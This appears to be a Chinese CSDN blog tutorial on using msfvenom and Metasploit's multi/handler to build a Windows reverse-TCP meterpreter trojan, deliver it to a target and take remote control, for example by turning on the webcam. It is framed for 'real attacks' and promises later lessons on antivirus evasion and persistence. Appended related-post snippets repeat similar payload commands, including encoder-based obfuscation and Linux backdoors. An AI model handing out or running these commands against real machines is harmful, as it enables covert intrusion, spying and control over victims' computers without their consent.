kalilinux - msf后门木马植入与远程监听

已于 2025-01-15 01:12:38 修改
阅读量657 收藏 11
点赞数 7
文章标签: 网络
于 2025-01-14 01:04:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_74923758/article/details/145126090
版权

在真实的攻击中,对方不一定是win7有永恒之蓝漏洞的版本。

所以在真实的攻击中我们要生成远控木马。

本节我们要讲的是

如何用msfvenom生成远控木马

msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听其上线。

以下我讲一个具体的windows可执行程序后门例子:

我的命令是:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.x.xxx lport=9999 -f exe -o demo9999

其中-p是payload的意思,后面的windows是系统,x64是架构,meterpreter是作用,reverse_tcp是方式。他们组合起来是pyload_name

lhost是listenhost,这里用的ip是你kali的ip,lport是监听端口。

-f是格式输出format output,exe为windows的可执行文件,-o就是输出,输出demo.exe文件。

可以看到demo.exe就输出在桌面了。

但是肯定不会那么顺利,毕竟因为对面电脑可能有杀毒软件查杀。这就得用一点手段了~以后会讲。

今天我就拿我自己的windows当作鱼儿。把生成的exe文件拖到windows

回到keli,我们要使用handler这个模块

这里的配置要与木马的配置保持一致。

然后运行run

此时只要等待目标机点击那个exe文件即可。但是一般都会被windows拦截。

你的windows在保护你!

如果对方能成功运行那个exe的话,则你的kali会立刻监听到目标机上线。并进入后渗透meterpreter,此时你就可以对目标机做你想做的操作了

(里面的ip都是例子)

例如打开摄像头

在更真实的情况下,如果对方发现你的病毒运行程序,把它删了。那你的木马就没有用了,因为你重新搞个一模一样的exe文件到目标机,甚至禁止用户使用该文件。

那怎么办呢?

这就要用到权限维持

下篇文章接着讲

kali的学习笔记篇(七)metasploit之PC后门
Kind&红衣的博客
08-12 1208
//生成后门 //参数可参照第五篇文章:PC渗透参数集 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.113 LPORT=55555 -f exe > /root/muma.exe //选择模块 use exploit/multi/handler //装载攻击载...
Kali渗透测试-远程控制:6200端口变成“后门
Liu_Bruce的博客
05-06 3308
Kali渗透测试-远程控制:6200端口变成“后门” 测试环境 攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机:Metasploitable2 - Linux (IP:192.168.68.205) 攻击工具:Netcat(nc) “瑞士军刀” 扫描工具:Nmap version 7.92 漏洞是黑客进入计算机的入口,如果目标主机上运行的vsftpd-2.3.4被黑客使用笑脸漏洞成功渗透,就会自动在6200
msf-Msfvenonm生成Linux后门木马实验
渗透、攻防、CTF、编程
10-12 9972
msf-meterpreter生成Linux后门木马实验 0x01 知识点 MSF工具的利用,msf生成Linux木马后门 0x02 实验环境: 攻击机kaili linux 2020 (ip:192.168.233.131) 攻击机kaili linux 2020 (ip:192.168.233.129) 0x03 实验过程 1、生成Linux后门 131机器打开kali msfconsole 输入 msfvenom -p linux/x64/meterpreter/reve..
msf后门种植
weixin_45605313的博客
07-10 520
Meterpreter后门MetsvcPersistenceNC Metsvc 无认证,固定31337端口 -A :自动启动匹配的利用漏洞/多个/处理程序以连接到服务 -r:卸载现有的MeterMeter服务(必须手动删除文件) Persistence 通过启动项启动,定期连接,系统启动时回连,自动运行 -A:自动启动匹配的利用漏洞/多个/处理程序以连接到代理 -S:作为服务启动时自动启动代理(具有系统权限) -U:当用户登录时自动启动代理 -L:目标主机中要向其写入负载的位置,如果没有,将使用
记录一次使用msf生成木马
最新发布
QINRAN_w的博客
03-30 550
这里出了个小差错,跑了半天没反应就发现应该是哪里有问题,然后回头看了一下相关设置,发现监听端口设置错误,我生成的木马中的监听端口为10086,但是我在使用模块时修改的监听端口为10085。我们应该把LHOST和LPORT设置为对应的ip地址和监听端口,还有最重要的一点就是要设置payload。ok,成功拿下,在run之后要记得回到靶机运行一下之前发送的weixin.exe。在这里我已经把木马发送给我的目标靶机了,接下来我们要打开msf,输入。首先,我们查看一下kali的IP地址。到这里实验就结束啦!
kali下生成web端后门
weixin_34397291的博客
12-07 866
  很多时候在***测试时选择web***害怕用的别人的马带有后门,这样自己的辛苦就要被别人不劳而获,很多时候我们都想拥有自己的马,那么这个时候你就应该使用kail来生成一个自己独特密码的web***了。 Kali Linux自带有好几个web***生成工具,下面我们来简单看几个:1.webacoo后门webacoo  -g -o test.php-g 制作后门代码-o 输出生成指定的后门程序文件...
kali Linux生成Windows后门
webkm的博客
04-24 1014
教程开始: Kali是一个强大系统,有很多的工具可以用来进行渗透。今天,介绍自己的初始的一个新手木马。 首先,查看一下工具msfvenom的功能参数吧。 msfvenom 查看功能模块 msfvenom -l payloads 然后,使用工具msfvenom来生成后门木马,这个是专业的创建木马后门的工具。命令如下: 生成了木马shell.exe,顺便一提lhost(localhost)和lport要设置为你的IP和你打算使用的端口。 ...
Linux学习之Kali制作简单的Windows的木马,创建后门
weixin_42514162的博客
11-01 6300
Kali是一个强大系统,有很多的工具可以用来进行渗透。今天,介绍自己的初始的一个新手木马。 首先,查看一下工具msfvenom的功能参数吧。 msfvenom 查看功能模块(超级多,要等一会,哈哈) msfvenom -l payloads 然后,使用工具msfvenom来生成后门木马,这个是专业的创建木马后门的工具。命令如下: msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.79.3 lport=2333 -f exe &
kali自学教程1.msf攻击永恒之蓝及后门木马植入
weixin_44145452的博客
08-06 894
kali自学
kali metasploit 制作后门程序远程操控基本使用方法
qq_51685718的博客
12-03 4390
kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作加密 后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exe lhost后面加的是本机ip,lport后面加的是想要打开的端口号 执行后会在本地生成一个biyu.exe的文件 如果直接上传到win系统会被杀毒软件杀掉,我们可以用自己的电脑对其进行一个加壳操作。 下
msf创建后门程序
m0_56135224的博客
05-21 405
msfvenom是用来生成后门的软件,可以实现在目标机上执行后门,在本地监听上线。(msfvenom在shell里使用,不是在mafconsole里使用)木马是我们最常说的病毒,分为两种,一是破坏型的,例如打开电脑就死机…二是控制型的,例如勒索病毒,远控木马…我们想实现远程控制别人电脑,但不是所有人电脑上都有漏洞,此时可以使用msfvenom生成远控木马
MSF生成木马渗透WIN7
妖魔鬼怪快离开的博客
11-15 5605
生成木马 使用msf模块中的msfvenom模块,生成.exe木马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击主机IP地址 LPORT=4444 -f exe > /home/tim/桌面/qq.exe 启动msfconsole msfconsole 设置payload参数 //开启监听· use exploit/multi/handler //设置tcp监听 set payload windows/meterpreter/rev
Kali linux渗透测试系列————32、Kali linux 维持访问之操作系统后门
Fly_鹏程万里
05-16 2412
操作系统后门简单来说,所谓后门(backdoor),就是绕过目标系统安全控制体系的正规用户认证过程而维持我们队目标系统的控制权,以及隐匿我们控制行为的方法。CymothoaCymothoa是一款可以将ShellCode注入到现有进程(插入进程)的后门工具。借助这种注入手段,它能够把ShellCode伪装成常规程序。他说注入的后门程序应当能够贝注入的程序(进程)共存,以避免被管理或维护人员怀疑。将...
kali生成后门远程控制电脑或手机
wutiangui的博客
05-07 4307
问题:Metasploit渗透测试中出的错误 Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).点击.exe文件直接运行安装,运行,下一步,直接完成安装。Android模拟器(靶机1):192.168.0.106。2.1首先从官网上下载模拟器雷电地址点击打开链接。靶机:192.168.25.106。二、环境配置二Android模拟器。
靶机测试,kali生成windows木马程序
2301_76361674的博客
05-03 1536
仅用于靶机测试!永恒之蓝:通过系统已有漏洞进行攻击,获得后门权限木马:通过将后门放到靶机上,获得权限。
Kali--MSF-永恒之蓝详解(复现、演示、远程后门、加壳、修复)
Innocence_0的博客
02-26 3026
永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
后门的类型kali生成后门如何实现,及如何使用
2301_77441874的博客
06-19 2022
小小的讲一下后门程序以及kali如何进行后门的生成以及调用。
内网渗透系列之mimikatz的使用以及后门植入
lza20001103的博客
09-04 4640
内网渗透系列之mimikatz的使用以及后门植入 文章目录内网渗透系列之mimikatz的使用以及后门植入前言mimikatz的使用后门植入msf永久后门植入(1)Meterpreter后门:Metsvc(2)Meterpreter后门:PersistenceNC后门后记 前言 内网渗透最重要的环节就是权限维持,当我们获取到靶机的权限后,当对方的机器关机后,我们所获取的会话也会跟着消失,也就是说当他重新开启后,我们又得重新进行信息收集,漏洞利用,又重复着上一个渗透的过程,工程量就很大了。所以,为了能一直维持
应急响应-后门攻击检测指南&Rookit&内存马&权限维持&WIN&Linux
SuperherRo的博客
04-08 824
后门攻击检测指南&Rookit&内存马&权限维持&WIN&Linux
kali渗透-msf木马免杀技术
02-07
### Kali Linux 中 Metasploit Framework 实现木马免杀技术 #### 使用 Msfvenom 工具生成并处理 Payloads Msfvenom 是一款强大的工具,它不仅能够创建恶意负载(payload),还提供了多种编码选项用于混淆这些 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值